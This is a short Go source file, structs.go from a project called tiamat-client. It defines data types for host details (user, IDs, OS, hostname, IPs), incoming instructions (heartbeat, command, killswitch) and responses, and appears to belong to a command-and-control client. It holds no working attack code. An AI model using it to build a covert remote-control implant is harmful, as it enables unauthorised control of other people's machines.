tiamat-client/structs.go

24 lines
375 B
Go
Raw Normal View History

package main
type Client struct {
Username string
UID string
GID string
OperatingSystem string
Hostname string
PublicIP string
LocalIP string
}
type Instructions struct {
IsHeartbeat bool
IsCommand bool
IsKillswitch bool
Message string
}
type Response struct {
Successful bool
Message string
}